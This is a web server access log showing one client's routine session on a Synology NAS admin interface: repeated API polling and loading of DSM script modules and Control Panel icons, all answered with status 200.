+[22/Jan/2026:12:54:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebStation/webstation_utils.js?v=3.1.0-0339&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 4054] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebStation/webstation.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 8042] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7390] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebStation/webstation_vue.js?v=3.1.0-0339&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 43316] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:34 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:52 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:54:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:02 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:02 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/synosecurityscan.js?v=1.0&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 19491] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 12224] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_panel.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 179477] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2259] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 5265] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/ControlPanel_24.png?v=42962-s9" [Client 84.1.26.27] [Length 940] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/bt_home.png?v=d49629622be38874147e356d927e8de8" [Client 84.1.26.27] [Length 403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/modules/modules.json?node=module_root&v=42962&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 961] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/cate_section_arrow.png?v=95a9615f74d941642d8125d6caa0639f" [Client 84.1.26.27] [Length 1456] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_shared_folders.png?v=c4794371cd3dfe68b0526e0ec68618eb" [Client 84.1.26.27] [Length 736] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_file_services.png?v=9ce23afabf66aec5882ff903f6f95ff0" [Client 84.1.26.27] [Length 704] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_user_and_group.png?v=d66020338f0d9b8045f225a1eb6d7a5e" [Client 84.1.26.27] [Length 622] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_external_access.png?v=a18bb9012e7059601b0118ca922c13eb" [Client 84.1.26.27] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_domain_and_LDAP.png?v=1d0ff3e4fcde3348fbf73006723e39c8" [Client 84.1.26.27] [Length 601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_terminal_and_SNMP.png?v=3e1d921a38989d8963b3e5d508650356" [Client 84.1.26.27] [Length 678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_info_center.png?v=07c1269577fedacf2a8feb8198de9dd8" [Client 84.1.26.27] [Length 636] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_login_portal.png?v=0e79e2539d1bb5099f31c3ba9b29ba4d" [Client 84.1.26.27] [Length 843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_notifications.png?v=976ca6e2eed6d46fccc393e0bd4b74c0" [Client 84.1.26.27] [Length 562] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_hardware_and_power.png?v=e2a6126a4034ccbd5c3f4cdbcb65287c" [Client 84.1.26.27] [Length 704] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_update_and_restore.png?v=63429550bc21cce682fc849377333f57" [Client 84.1.26.27] [Length 721] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_privilege.png?v=586a9a33003bafcead8f510e6a9583d2" [Client 84.1.26.27] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_network.png?v=505a2f6f0d40b68c87f2bdd9e6eb91ae" [Client 84.1.26.27] [Length 761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_security.png?v=5570e036e27d838bceaec3b032c11311" [Client 84.1.26.27] [Length 758] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 